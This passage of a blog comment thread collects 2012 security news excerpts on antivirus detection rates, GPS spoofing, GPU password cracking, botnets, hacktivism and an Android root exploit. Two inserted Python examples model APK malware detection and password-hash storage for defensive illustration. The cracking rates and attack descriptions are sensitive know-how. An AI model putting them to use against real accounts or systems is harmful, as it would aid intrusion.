    In 2012, Imperva, with a group of students from The Technion – Israeli Institute of Technology, conducted a study of more than 80
    malware samples to assess the effectiveness of antivirus software.

    Based on our review, we believe:
    1. The initial detection rate of a newly created virus is less than 5%. Although vendors try to update their detection
    mechanisms, the initial detection rate of new viruses is nearly zero. We believe that the majority of antivirus products on the
    market can’t keep up with the rate of virus propagation on the Internet.
    2. For certain antivirus vendors, it may take up to four weeks to detect a new virus from the time of the initial scan.
    3. The vendors with the best detection capabilities include those with free antivirus packages, Avast and Emisoft,
    though they do have a high false positive rate.

    To be clear, we don’t recommend eliminating antivirus.

    Reply
  21. Tomi Engdahl says:

    Pakistan Cyber Army declares war on Chinese, Bangladeshi sites
    Hacktivists go on web defacement spree
    http://www.theregister.co.uk/2012/12/10/pakistan_cyber_army_hack_bangladesh_china/

    Hacktivists claiming to hail from the Pakistan Cyber Army have defaced over 400 Chinese government web sites and also hit in excess of 20 Bangladeshi government sites.

    A hacker known as ‘Code Cracker’ is claiming responsibility for the attack on the official web site of Xuchang City People’s Procuratorate and a whopping 436 sub-domains, according to HackRead.

    The domains were posted to hackers’ favourite Pastebin and all now appear to have been taken offline.

    The Pakistan Cyber Army are among the more prolific hacktivist groups from the region, with Indian targets a particular favourite.

    Reply
  22. Tomi Engdahl says:

    Researchers find crippling flaws in global GPS
    http://www.scmagazine.com.au/News/325731,researchers-find-crippling-flaws-in-global-gps.aspx

    Researchers have developed three attacks capable of crippling Global Positioning System infrastructure critical to the navigation of a host of military and civilian technologies including planes, ships and unmanned drones.

    The scenarios developed include novel remote attacks via malicious GPS broadcasts against consumer and professional-grade receivers which could be launched using $2500 worth of equipment.

    A 45-second crafted GPS message could bring down up to 30 percent of the global GPS Continuously Operating Reference Stations (CORS), while other attacks could take down 20 percent of NTRIP networks, security boffins from Carnegie Mellon University and firm Coherent Navigation wrote in a paper.

    Together, attack scenarios created “serious ramifications to safety systems”.

    “Until GPS is secured, life and safety-critical applications that depend upon it are likely vulnerable to attack,” the team of four researchers said.

    “The good news is that as far as we know, we are the only ones with a spoofing device currently capable of the types of attacks,” Nighswander said.

    “The bad news is that our spoofer would not be prohibitively expensive and complicated for someone to build, if they had the proper skillset.”

    Attacks were conducted against seven receiver brands including Magellan, Garmin, GlobalSat, uBlox, LOCOSYS and iFly 700.

    Trimble was working with researchers to push out a patch for its affected products, Nighswander said.

    Attacks included location spoofing in applications used by planes, cars, trucks and ships to prisoner ankle bracelets, mobile phone towers, traffic lights, and SCADA systems.

    The researchers said their work differed from existing GPS jamming and spoofing attacks because it detailed a larger attack surface “by viewing GPS as a computer system”. This included analysis of GPS protocol messages and operating systems, the GPS software stack and how errors affect dependent systems.

    “The overall landscape of GPS vulnerabilities is startling, and our experiments demonstrate a significantly larger attack surface than previously thought,” the researchers wrote.

    “For example, we show that we can permanently de-synchronise the date of Phasor Measurement Units used in [a] smart grid. We also show we can cause UNIX epoch rollover in a few minutes, and year 100,000 (the first 6-digit year) rollover in about two days.”

    Reply
  23. Tomi Engdahl says:

    Ubuntu Spyware: What to Do?
    http://www.fsf.org/blogs/rms/ubuntu-spyware-what-to-do

    One of the major advantages of free software is that the community protects users from malicious software. Now Ubuntu GNU/Linux has become a counterexample. What should we do?

    Proprietary software is associated with malicious treatment of the user: surveillance code, digital handcuffs (DRM or Digital Restrictions Management) to restrict users, and back doors that can do nasty things under remote control. Programs that do any of these things are malware and should be treated as such. Widely used examples include Windows, the iThings, and the Amazon “Kindle” product for virtual book burning, which do all three;

    Ubuntu, a widely used and influential GNU/Linux distribution, has installed surveillance code. When the user searches her own local files for a string using the Ubuntu desktop, Ubuntu sends that string to one of Canonical’s servers. (Canonical is the company that develops Ubuntu.)

    This is just like the first surveillance practice I learned about in Windows.

    Ubuntu uses the information about searches to show the user ads to buy various things from Amazon.

    However, the ads are not the core of the problem. The main issue is the spying. Canonical says it does not tell Amazon who searched for what. However, it is just as bad for Canonical to collect your personal information as it would have been for Amazon to collect it.

    People will certainly make a modified version of Ubuntu without this surveillance. In fact, several GNU/Linux distros are modified versions of Ubuntu. When those update to the latest Ubuntu as a base, I expect they will remove this. Canonical surely expects that too.

    Canonical has not abandoned the Ubuntu spyware. Perhaps Canonical figures that the name “Ubuntu” has so much momentum and influence that it can avoid the usual consequences and get away with surveillance.

    Ubuntu allows users to switch the surveillance off. Clearly Canonical thinks that many Ubuntu users will leave this setting in the default state (on). And many may do so, because it doesn’t occur to them to try to do anything about it. Thus, the existence of that switch does not make the surveillance feature ok.

    Reply
  24. Tomi Engdahl says:

    Amazon search results in the Dash
    http://www.markshuttleworth.com/archives/1182

    It makes perfect sense to integrate Amazon search results in the Dash, because the Home Lens of the Dash should let you find *anything* anywhere. Over time, we’ll make the Dash smarter and smarter, so you can just ask for whatever you want, and it will Just Work.

    Reply
  25. Tomi Engdahl says:

    Mobile certificate may be applied for the wrong personal data

    Electronic identification used in a mobile certificate may be applied for from the operator with the wrong personal information without consequences, says the Finnish Ministry of the Interior.

    This is due to the fact that identity theft as such is not a criminal offense in Finland.

    Counselor Johanna Kari sees a contradiction in the way the certification authorities are treated. Providing false personal data to the authorities is a crime, but providing false information to a private operator, such as telecom operator is not.

    “Operators are actually hoped for the criminalization of identity theft. Operators are experiencing a gap in it, that they may attempt to deceive, but the authorities do not.”

    The danger is that the information from the certificate can be used to identify a person.

    Use of the mobile identification certificates is rising, so the identification system should be improved to be proof.

    “Although the presentation of false personal data to the operator is not a crime, using the resulting invalid tag is,” emphasizes business leader Henri Korpi, Elisa.

    “If the tag is used to try to deceive even the co-contractor, it is very often fraudulent.”

    Source: http://www.3t.fi/artikkeli/uutiset/teknologia/mobiilivarmennetta_saa_haettua_vaarilla_henkilotiedoilla

    Reply
  26. Tomi Engdahl says:

    That square QR barcode on the poster? Check it’s not a sticker
    Crooks slap on duff codes leading to evil sites
    http://www.theregister.co.uk/2012/12/10/qr_code_sticker_scam/

    Cybercrooks are putting up stickers featuring URLs embedded in Quick Response codes (QR codes) as a trick designed to drive traffic to dodgy sites.

    QR codes are two-dimensional matrix barcodes that can be scanned by smartphones and that link users directly to a website without having to type in its address. By using QR codes (rather than links) as a jump-off point to dodgy sites, cybercrooks can disguise the ultimate destination of links.

    Security watchers have already seen spam messages pointing to URLs that use embedded QR codes. Now crooks have gone one step further by printing out labels and leaving them in well trafficked locations.

    “There has been an explosion in the number of QR codes over the last couple of years, and cybercriminals are taking full advantage. Because QR codes just look like pictures it’s extremely difficult to tell if they’re genuine or malicious, making it easy to dupe passers-by into scanning codes that may lead to an infected site, or perhaps a phishing site.”

    Reply
  27. Tomi Engdahl says:

    Tor node admin raided by cops appeals for help with legal bills
    http://www.theregister.co.uk/2012/12/10/tor_admin/

    A sysadmin had his flat raided and equipment seized by police last week for hosting a Tor exit node.

    William Weber from Graz, Austria, was questioned by cops after someone allegedly distributed child abuse images over one of the Tor exits he administered.

    Tor (The Onion Router) offers, among other things, anonymised web browsing and has many legitimate applications including getting around censorship controls in countries with a poor human rights record. Tor routes traffic through a number of relay nodes before delivering the packets to their final destination, confusing attempts to figure out where traffic originated. Volunteers such as Weber administer “exit nodes” – the final stepping stone on the network.

    The system is used by journalists, activists and military organisations around the world to bypass censorship and communicate securely. Like any technology Tor can also lend itself to unsavoury applications.

    This leaves anyone providing hardware to the Tor project in a difficult position.

    “Tor admins should open a LLC (if US) or Limited (in UK, if EU) or registered partnership/non-profit (German Verein, if in Germany) company as owner of these servers,” Weber said. “This removes the hassle of running it as private person and remove at least a bit liability (in most countries) if not all of it (in Germany, Telemediengesetz).”

    “Besides this there should be good contact with the ISP beforehand, let them know that there will be abuse (filesharing and the DMCA, mainly) and what Tor is. Or if more money is available to invest, a membership of ARIN/RIPE is well worth it, getting own IP blocks and an AS number (running their own network) helps to resolve issues faster and means you get direct information if servers should be tapped or confiscated (unlike if rented, then only your ISP gets the warning).”

    “I could not make them understand why I would ‘waste’ resources and bandwidth (translating into money) to run a Tor node.”

    “It’s not unusual for the maintainer of a [Tor] exit node to be the focus of abuse complaints: mostly DCMA notices, I think. Reports of paedophilia-related abuse are a lot rarer, but not unheard of,” he added.

    Reply
  28. Tomi Engdahl says:

    Boffin: Android’s on-board malware scanner utterly FAILS
    App blocker detects just 15% of malware
    http://www.theregister.co.uk/2012/12/10/android_malware_scanner_fails/

    Google has added new anti-malware capabilities to Android 4.2 “Jelly Bean,” but relying on them to block malicious apps might not be a good idea, says a computer science boffin from North Carolina State University.

    The latest Android – currently only found on a select group of handsets – includes an on-device “application verification service” that claims to be able to alert users of potentially harmful apps and block their installation, irrespective of where they came from.

    Associate professor Xuxian Jiang wanted to know how well the new feature fared against known Android malware, and to that end he pitted it against a collection of samples obtained by the university’s Android Malware Genome Project.

    The results? Not so good. Of the 1,260 samples tested, Android’s on-device malware checker only managed to spot 193 of them, for a paltry detection rate of just 15.3 per cent.

    Why such a poor showing for Google’s product? According to Jiang, Jelly Bean’s app verification service relies on relatively few data points to decide whether or not to block a given app install.

    “Specifically, our study indicates that the app verification service mainly uses an app’s SHA1 value and the package name to determine whether it is dangerous or potentially dangerous,” he writes. “This mechanism is fragile and can be easily bypassed. It is already known that attackers can change with ease the checksums of existing malware (e.g., by repackaging or mutating it).”

    Reply
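As an added illustration of the fragility Jiang describes (this is example code written for this thread, not Google’s verification service or the NC State study’s code), the block below models the two approaches on constructed stand-in “APKs”: plain zip files with a text manifest and a code blob, not real Android packages. The hash-based check keys on the whole-file SHA1 and the package name, as the quote says the Jelly Bean service mainly does; the feature-based check keys on a hash of the code blob and on the overlap of requested permissions. All sample names, permissions and byte strings are constructed for the example.

```python
"""Exact-hash app verification beside a feature-based check.

Added example, not code from Google's verification service or from the
NC State study: it models the weakness Jiang describes (matching a
whole-file SHA1 plus the package name) against constructed stand-in
'APKs' (plain zip files with a text manifest, not real Android packages)
and shows a check that keys on the code blob and the permission set instead.
"""
import hashlib
import io
import zipfile

FIXED_TIME = (1980, 1, 1, 0, 0, 0)   # fixed zip timestamps keep builds deterministic


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def build_apk(package: str, permissions, dex: bytes, extra: str = "") -> bytes:
    """Build a constructed stand-in APK: a zip with a text manifest and a code blob."""
    manifest = f"package={package}\n" + "".join(
        f"uses-permission={p}\n" for p in sorted(permissions))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in [("AndroidManifest.xml", manifest.encode()), ("classes.dex", dex)]:
            z.writestr(zipfile.ZipInfo(name, date_time=FIXED_TIME), data)
        if extra:   # what a repackager typically adds: an extra asset, an ad library, etc.
            z.writestr(zipfile.ZipInfo("assets/extra.txt", date_time=FIXED_TIME), extra.encode())
    return buf.getvalue()


def parse_apk(apk: bytes) -> dict:
    """Extract package name, requested permissions and a hash of the code blob."""
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        manifest = z.read("AndroidManifest.xml").decode()
        dex = z.read("classes.dex")
    info = {"package": None, "permissions": set(), "dex_sha1": sha1_hex(dex)}
    for line in manifest.splitlines():
        key, _, value = line.partition("=")
        if key == "package":
            info["package"] = value
        elif key == "uses-permission":
            info["permissions"].add(value)
    return info


def flagged_by_hash(apk: bytes, bad_hashes: set, bad_packages: set) -> bool:
    """The fragile check: whole-file SHA1 or package name must match exactly."""
    return sha1_hex(apk) in bad_hashes or parse_apk(apk)["package"] in bad_packages


def flagged_by_features(apk: bytes, signatures: list, threshold: float = 0.8) -> bool:
    """Match on the code blob hash, or on a high Jaccard overlap of permissions."""
    info = parse_apk(apk)
    for sig in signatures:
        if info["dex_sha1"] == sig["dex_sha1"]:
            return True
        common = len(info["permissions"] & sig["permissions"])
        union = len(info["permissions"] | sig["permissions"])
        if union and common / union >= threshold:
            return True
    return False


# --- constructed samples -----------------------------------------------------
MALWARE_DEX = b"\x64\x65\x78\x0a" + b"constructed malicious code blob"
MALWARE_PERMS = {"SEND_SMS", "READ_CONTACTS", "RECEIVE_BOOT_COMPLETED", "INTERNET"}
ORIGINAL = build_apk("com.example.badapp", MALWARE_PERMS, MALWARE_DEX)
# Same code, renamed package plus one extra file: the whole-file hash no longer matches.
REPACKAGED = build_apk("com.example.cleanlooking", MALWARE_PERMS, MALWARE_DEX, extra="ads")
BENIGN = build_apk("com.example.notes", {"INTERNET"}, b"\x64\x65\x78\x0a" + b"constructed benign code")

BAD_HASHES = {sha1_hex(ORIGINAL)}
BAD_PACKAGES = {"com.example.badapp"}
SIGNATURES = [parse_apk(ORIGINAL)]


def compare_detectors() -> dict:
    """Return, per sample, what each detector says."""
    samples = {"original": ORIGINAL, "repackaged": REPACKAGED, "benign": BENIGN}
    return {name: {"hash": flagged_by_hash(apk, BAD_HASHES, BAD_PACKAGES),
                   "features": flagged_by_features(apk, SIGNATURES)}
            for name, apk in samples.items()}


if __name__ == "__main__":
    for name, result in compare_detectors().items():
        print(f"{name:>10}: hash-based={result['hash']!s:5} feature-based={result['features']!s:5}")
```

The whole-file hash is a perfectly good indicator for the exact sample it was taken from, which is why it misses the repackaged copy while the benign app stays clean under both checks. Hashing the code artifact inside the container survives a repackage that leaves the code alone, and the permission overlap is a crude stand-in for the richer static and behavioural features a real verifier would use; neither is a substitute for a signer-certificate or code-signing policy.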
  29. Tomi Engdahl says:

    25-GPU cluster cracks every standard Windows password in <6 hours
    All your passwords are belong to us.
    http://arstechnica.com/security/2012/12/25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours/

    A password-cracking expert has unveiled a computer cluster that can cycle through as many as 350 billion guesses per second. It's an almost unprecedented speed that can try every possible Windows passcode in the typical enterprise in less than six hours.

    The five-server system uses a relatively new package of virtualization software that harnesses the power of 25 AMD Radeon graphics cards.

    It achieves the 350 billion-guess-per-second speed when cracking password hashes generated by the NTLM cryptographic algorithm that Microsoft has included in every version of Windows since Server 2003. As a result, it can try an astounding 95^8 combinations in just 5.5 hours, enough to brute force every possible eight-character password containing upper- and lower-case letters, digits, and symbols. Such password policies are common in many enterprise settings. The same passwords protected by Microsoft's LM algorithm—which many organizations enable for compatibility with older Windows versions—will fall in just six minutes.

    The Linux-based GPU cluster runs the Virtual OpenCL cluster platform, which allows the graphics cards to function as if they were running on a single desktop computer. ocl-Hashcat Plus, a freely available password-cracking suite optimized for GPU computing, runs on top, allowing the machine to tackle at least 44 other algorithms at near-unprecedented speeds. In addition to brute-force attacks, the cluster can bring that speed to cracks that use a variety of other techniques, including dictionary attacks containing millions of words.

    "What this cluster means is, we can do all the things we normally would with Hashcat, just at a greatly accelerated rate," Jeremi Gosney, the founder and CEO of Stricture Consulting Group, wrote in an e-mail to Ars.

    Using the new cluster, the same attack would move about four times faster. That's because the machine is able to make about 63 billion guesses against SHA1, the algorithm used to hash the LinkedIn passwords.

    The cluster can try 180 billion combinations per second against the widely used MD5 algorithm.

    The speeds apply to so-called offline cracks, in which password lists are retrieved by hackers who exploit vulnerabilities on website or network servers. The passwords are typically stored using one-way cryptographic hash functions, which generate a unique string of characters for each unique string of plaintext. In theory, hashes can't be mathematically reversed. The only way to crack them is to run guesses through the same cryptographic function. When the output of a particular guess matches a hash in a compromised list, the corresponding password has been cracked.

    The advent of GPU computing over the past decade has contributed to huge boosts in offline password cracking.

    "Before VCL people were trying lots of different things to varying degrees of success," Gosney said. "VCL put an end to all of this, because now we have a generic solution that works right out of the box, and handles all of that complexity for you automatically. It's also really easy to manage because all of your compute nodes only have to have VCL installed, nothing else. You only have your software installed on the cluster controller."

    The precedent set by the new cluster means it's more important than ever for engineers to design password storage systems that use hash functions specifically suited to the job. Unlike MD5, SHA1, SHA2, the recently announced SHA3, and a variety of other "fast" algorithms, functions such as Bcrypt, PBKDF2, and SHA512crypt are designed to expend considerably more time and computing resources to convert plaintext input into cryptographic hashes. As a result, the new cluster, even with its four-fold increase in speed, can make only 71,000 guesses against Bcrypt and 364,000 guesses against SHA512crypt.

    Reply
  30. Tomi Engdahl says:

    25-GPU cluster cracks every standard Windows password in <6 hours
    http://arstechnica.com/security/2012/12/25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours/

    The five-server system uses a relatively new package of virtualization software that harnesses the power of 25 AMD Radeon graphics cards. It achieves the 350 billion-guess-per-second speed when cracking password hashes generated by the NTLM cryptographic algorithm that Microsoft has included in every version of Windows since Server 2003. As a result, it can try an astounding 95^8 combinations in just 5.5 hours, enough to brute force every possible eight-character password containing upper- and lower-case letters, digits, and symbols. Such password policies are common in many enterprise settings. The same passwords protected by Microsoft's LM algorithm—which many organizations enable for compatibility with older Windows versions—will fall in just six minutes.

    The precedent set by the new cluster means it's more important than ever for engineers to design password storage systems that use hash functions specifically suited to the job. Unlike MD5, SHA1, SHA2, the recently announced SHA3, and a variety of other "fast" algorithms, functions such as Bcrypt, PBKDF2, and SHA512crypt are designed to expend considerably more time and computing resources to convert plaintext input into cryptographic hashes. As a result, the new cluster, even with its four-fold increase in speed, can make only 71,000 guesses against Bcrypt and 364,000 guesses against SHA512crypt.

    Reply
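To make the numbers in the two Ars Technica posts above (comments 29 and 30) concrete, here is an added example written for this thread, not code from the article, from Hashcat or from VCL. It reproduces the keyspace arithmetic for 95 printable ASCII characters at length 8 against the guess rates the article quotes, then shows the storage side of the argument: a password stored with PBKDF2-HMAC-SHA256 from the Python standard library (bcrypt and sha512crypt, named in the article, play the same role but are not in the standard library), verified with a constant-time comparison, and a small single-core benchmark of MD5 against PBKDF2 on the machine it runs on. The storage-string layout, the iteration count, the candidate passwords and the salt are constructed for the example.

```python
"""Why the cracking rates in the article matter for password storage.

Added example, not code from the Ars Technica article, Hashcat or VCL:
it reproduces the keyspace arithmetic (95 printable ASCII characters,
length 8) for the guess rates quoted there, and contrasts a fast hash
(MD5) with a deliberately slow password hash (PBKDF2-HMAC-SHA256 from the
standard library; bcrypt and sha512crypt from the article play the same
role but are not in the standard library).
"""
import hashlib
import hmac
import os
import time

PRINTABLE_ASCII = 95          # upper- and lower-case letters, digits and symbols
# Guesses per second quoted in the article for the 25-GPU cluster.
ARTICLE_RATES = {"NTLM": 350e9, "MD5": 180e9, "SHA1": 63e9,
                 "sha512crypt": 364_000, "bcrypt": 71_000}


def keyspace(charset_size: int, length: int) -> int:
    """Number of distinct passwords of exactly `length` characters."""
    return charset_size ** length


def hours_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Hours needed to try every password in the keyspace at the given rate."""
    return keyspace(charset_size, length) / guesses_per_second / 3600


def hash_password(password: str, salt: bytes = b"", iterations: int = 600_000) -> str:
    """Store a password as PBKDF2-HMAC-SHA256 with a random 16-byte salt.

    The 'algo$iterations$salt$digest' layout is a constructed format for this
    example; the iteration count is what makes each attacker guess expensive.
    """
    if not salt:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and iteration count."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # constant-time comparison so the check itself leaks nothing about the digest
    return hmac.compare_digest(candidate.hex(), digest_hex)


def _guess_rate(hash_fn, seconds: float) -> float:
    """Hash constructed candidate passwords for `seconds`; return guesses per second."""
    count = 0
    start = time.perf_counter()
    while time.perf_counter() - start < seconds:
        hash_fn(b"Tr0ub4dor&%d" % count)   # constructed candidate
        count += 1
    return count / (time.perf_counter() - start)


def benchmark(seconds: float = 0.2, iterations: int = 600_000) -> dict:
    """Single-core guess rates on this machine for a fast and a slow hash."""
    salt = b"constructed-fixed-salt"
    return {
        "md5": _guess_rate(lambda pw: hashlib.md5(pw).digest(), seconds),
        "pbkdf2_sha256": _guess_rate(
            lambda pw: hashlib.pbkdf2_hmac("sha256", pw, salt, iterations), seconds),
    }


if __name__ == "__main__":
    for algo, rate in ARTICLE_RATES.items():
        h = hours_to_exhaust(PRINTABLE_ASCII, 8, rate)
        print(f"{algo:>12}: {rate:>15,.0f} guesses/s -> {h:,.1f} hours for all 95^8 passwords")
    stored = hash_password("correct horse battery staple")   # constructed password
    print("verify ok:", verify_password("correct horse battery staple", stored),
          "| wrong rejected:", not verify_password("wrong", stored))
    rates = benchmark()
    print(f"local single core: md5 {rates['md5']:,.0f}/s vs pbkdf2 {rates['pbkdf2_sha256']:,.1f}/s")
```

At the article's 350 billion NTLM guesses per second the full 95^8 keyspace falls in a little over five hours, which is the "5.5 hours" figure; at the 71,000 bcrypt guesses per second the same keyspace takes tens of millions of hours. The local benchmark makes the same point on one CPU core: the slow function costs the defender one PBKDF2 call per login, but costs the attacker that same call per guess.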
  31. Tomi Engdahl says:

    Hacker Group Touts 1.6 Million Password Dump To Protest UN Internet Regulation
    http://www.forbes.com/sites/andygreenberg/2012/12/10/hacker-group-touts-1-6-million-password-dump-to-protest-un-internet-regulation/

    The controversy around a United Nations body’s efforts to regulate the Internet have already been opposed in a U.S. Congressional resolution, a million-signature petition from Google, and by one of the Internet’s most famous creators. Now a group of hackers has registered their protest in the form they know best: Stealing and dumping millions of seemingly random usernames and passwords onto the Web.

    The data dump, according to its accompanying statement, is aimed at “promoting hacktivism worldwide and drawing attention to the freedom of information on the net. For those two factors we have prepared a juicy release of 1.6 million accounts/records from fields such as aerospace, nanotechnology, banking, law, education, government, military, all kinds of wacky companies & corporations working for the department of defense, airlines and more.”

    The statement offers Ghost Shell’s support to protests initiated by the hacker movement Anonymous against the ITU’s Internet regulation, encouraging websites to “deface themselves” with anti-ITU messages.

    Anonymous published a lengthy statement of its own Monday, speaking out against the ITU’s regulations and specifically the “deep-packet inspection” standard it created last week for control and censorship of Internet traffic. “Don’t mess with the net. We like what we have. Our internet is working perfectly as a free and open model,” the statement reads. “It is your old systems that don’t work correctly. We cannot allow idiots to destroy our internet.”

    Reply
  32. Tomi Engdahl says:

    Nokia engineer shows how to pirate games from the Windows 8 store
    http://www.theverge.com/2012/12/11/3754006/windows-8-games-hack-piracy-in-app-purchases-justin-angel

    Justin Angel, a Nokia engineer working on Windows Phone, has detailed how to compromise Windows 8 games revenue through in-app purchases. Angel highlights the Soulcraft Windows 8 game as an example of how Windows 8 users could potentially edit parts of a game to bypass having to pay for in-app purchases.

    The process is a little complex for the average Windows 8 user, but the steps show the easy potential for piracy with Microsoft’s Windows Store approach.

    Windows games have been affected by keygens and patches for years, but Angel says “storing encrypted data locally, alongside with the algorithm and the algorithm key/hash is a recipe for security incidents.”

    Reply
  33. Tomi Engdahl says:

    FBI, International Law Enforcement Disrupt International Organized Cyber Crime Ring Related to Butterfly Botnet
    http://www.fbi.gov/news/pressrel/press-releases/fbi-international-law-enforcement-disrupt-international-organized-cyber-crime-ring-related-to-butterfly-botnet

    The Department of Justice and the FBI, along with international law enforcement partners, announced the arrests of 10 individuals from Bosnia and Herzegovina, Croatia, Macedonia, New Zealand, Peru, the United Kingdom, and the United States and the execution of numerous search warrants and interviews.

    The operation identified international cyber crime rings that are linked to multiple variants of the Yahos malicious software, or malware, which is linked to more than 11 million compromised computer systems and over $850 million in losses via the Butterfly Botnet, which steals computer users’ credit card, bank account, and other personal identifiable information.

    Facebook’s security team provided assistance to law enforcement throughout the investigation by helping to identify the root cause, the perpetrators, and those affected by the malware. Yahos targeted Facebook users from 2010 to October 2012, and security systems were able to detect affected accounts and provide tools to remove these threats.

    Reply
  34. Tomi Engdahl says:

    E-mail e-signature still rare – too hard?

    E-mail signature is not much used in Finland.
    According to experts, consumers as well as businesses and government rarely sign their mail.

    “No one can prevent your name from counterfeiting. It also must be taken with the seriousness,” says Communications Security Agency Head Erka Koivunen.

    Electronic signature is used to verify that the sender is really the person who reads the email. An unsigned e-mail can be a big security risk, because anyone can send a message to someone else’s name.

    Both consumers and service providers laziness effort: users are excited about the additional functions of e-mail in connection with, the producers did not turn invested in user-friendly technology.

    “If there was an easy way to sign or encrypt e-mail, using it would be broader,” Koivunen believes.

    “The problem is, how the Internet can be globally distribute keys (electronic signature authentication) management.”

    Source: http://www.3t.fi/artikkeli/uutiset/teknologia/sahkopostin_sahkoinen_allekirjoitus_yha_harvinaista_liian_hankalaa

    Reply
  35. Tomi Engdahl says:

    Internet Explorer Data Leakage
    http://spider.io/blog/2012/12/internet-explorer-data-leakage/

    On the 1st of October, 2012, we disclosed to Microsoft the following security vulnerability in Internet Explorer, versions 6–10, which allows your mouse cursor to be tracked anywhere on the screen—even if the Internet Explorer window is minimised. The vulnerability is particularly troubling because it compromises the security of virtual keyboards and virtual keypads.

    Whilst the Microsoft Security Research Center has acknowledged the vulnerability in Internet Explorer, they have also stated that there are no immediate plans to patch this vulnerability in existing versions of the browser. It is important for users of Internet Explorer to be made aware of this vulnerability and its implications.

    The vulnerability is already being exploited by at least two display ad analytics companies across billions of page impressions per month.

    A demonstration of the security vulnerability may be seen

    Reply
  36. Tomi Engdahl says:

    ReVuln – The TV is watching you
    http://vimeo.com/55174958

    In this video we demonstrate one of our 0-day vulnerabilities affecting Smart TV, in this case a Samsung TV LED 3D. Smart TV can be used to browse the internet, use social networks, purchase movies and do many other things. This demo shows how a vulnerability for such devices can be used to retrieve sensitive information, monitor and root the device itself remotely.

    Reply
  37. Tomi Engdahl says:

    Islamic Hacker Group Resumes Attacks On Banks
    http://yro.slashdot.org/story/12/12/13/2058234/islamic-hacker-group-resumes-attacks-on-banks

    “PNC, Bank of America, SunTrust, and other major financial institutions have experienced a wave of DDoS attacks and site outages over the past couple of days, and Islamic extremist hacker group Izz ad-Din al-Qassam Cyber Fighters is claiming responsibility”

    Reply
  38. Tomi Engdahl says:

    The 30-year-old prank that became the first computer virus
    http://www.theregister.co.uk/2012/12/14/first_virus_elk_cloner_creator_interviewed/

    To the author of ‪Elk Cloner‬, the first computer virus to be released outside of the lab, it’s sad that, 30 years after the self-replicating code’s appearance, the industry has yet to come up with a secure operating system.

    When Rich Skrenta created Elk Cloner as a prank in February 1982, he was a 15-year-old high school student with a precocious ability in programming and an overwhelming interest in computers. The boot sector virus was written for Apple II systems, the dominant home computers of the time, and infected floppy discs.

    Infected computers would display a short poem, also written by Skrenta, on every fiftieth boot from an infected disk.

    Elk Cloner, which played other, more subtle tricks every five boots, caused no real harm but managed to spread widely. Computer viruses had been created before, but Skrenta’s prank app was the first to spread in the wild, outside the computer system or network on which it was created.

    This got him thinking: could he alter the contents of a floppy disc without touching it? His experiments led him to develop a program that would run in the background, checking for the presence of a new disk and, if it found one, could modify files stored on the disk.

    The result of this work was a program that, in effect, was coded to hop from disk to disk, propagating itself from machine to machine. The first virus, Elk Cloner, was born.

    Elk Cloner took about two weeks to write in assembly language, Skrenta recalls. And if its mode of operation sounds simple, making it actually happen was quite a technical challenge.

    “It worked like a charm and spread all over the place.”

    Friends may have cursed Skrenta and then, seeing the joke, chuckled at his antics, but not everyone was impressed by the humour or the programming skill he demonstrated.

    “The virus is fairly harmless, had no network connectivity, and problems were solved by a reboot,” he says.

  39. Tomi Engdahl says:

    Massive bank cyberattack planned
    http://money.cnn.com/2012/12/13/technology/security/bank-cyberattack-blitzkrieg/

    Security firm McAfee on Thursday released a report warning that a massive cyberattack on 30 U.S. banks has been planned, with the goal of stealing millions of dollars from consumers’ bank accounts.

    RSA startled the security world with its announcement that a gang of cybercriminals had developed a sophisticated Trojan aimed at funneling money out of bank accounts from Chase (JPM, Fortune 500), Citibank (C, Fortune 500), Wells Fargo (WFC, Fortune 500), eBay (EBAY, Fortune 500) subsidiary PayPal and dozens of other large banks. Known as “Project Blitzkrieg,” the plan has been successfully tested on at least 300 guinea pig bank accounts in the United States, and the crime ring had plans to launch its attack in full force in the spring of 2013, according to McAfee, a unit of Intel.

    Project Blitzkrieg began with a massive cybercriminal recruiting campaign, promising each recruit a share of the stolen funds in exchange for their hacking ability and busywork.

    The financial industry is accustomed to fending off skilled cyberthieves. It gets hit every day by thousands of attacks on its infrastructure and networks, according to Bill Wansley, a senior vice president at Booz Allen Hamilton who specializes in cybersecurity issues.

    Those are just the attacks that get discovered. Not a single financial industry network that Booz Allen examined has been malware-free, he noted.

    “If you catch something early on, you can minimize the threat,” Wansley said. “It’s definitely worthwhile to get a heads up.”

    The Cyber Fighters are at it again, declaring that they will be launching attacks on banks’ websites this week as part of “Operation Ababil.” The banks are preparing.

    “Security is core to our mission and safeguarding our customers’ information is at the foundation of all we do,” said Wells Fargo spokeswoman Sara Hawkins. “We constantly monitor the environment, assess potential threats, and take action as warranted.”

    In June, McAfee uncovered “Operation High Roller” — a cyberattack that could have stolen as much as $80 million from more than 60 banks.

  40. Tomi Engdahl says:

    New exploit could give Android malware apps access to user data on Samsung GS III, other devices
    http://thenextweb.com/mobile/2012/12/16/new-exploit-could-give-android-malware-apps-access-to-user-data-on-samsung-gs-iii-other-devices/

    The brilliant minds at XDA Developers have done it again; this time, a user by the name of alephzain claims to have discovered a vulnerability in multiple Samsung devices that gives access to all physical memory. The potential is huge: attackers could use malicious apps to wipe data and brick devices or, more likely, quietly access user data.

    While Samsung has yet to confirm the issue, it’s already being exploited. In fact, a senior moderator who calls himself Chainfire has created an APK file that uses Alephzain’s exploit, dubbed ExynosAbuse, to gain root privileges and install the latest release of SuperSU “on any Exynos4-based device.”

    It’s worth noting that we are not aware of any Android malware apps that exploit this particular vulnerability. Furthermore, many devices are not affected since they don’t have the right processor;

    Supercurio has released a quick fix for the vulnerability while we wait for Samsung to respond.

  41. Tomi Engdahl says:

    Dexter – Draining blood out of Point of Sales
    http://blog.seculert.com/2012/12/dexter-draining-blood-out-of-point-of.html

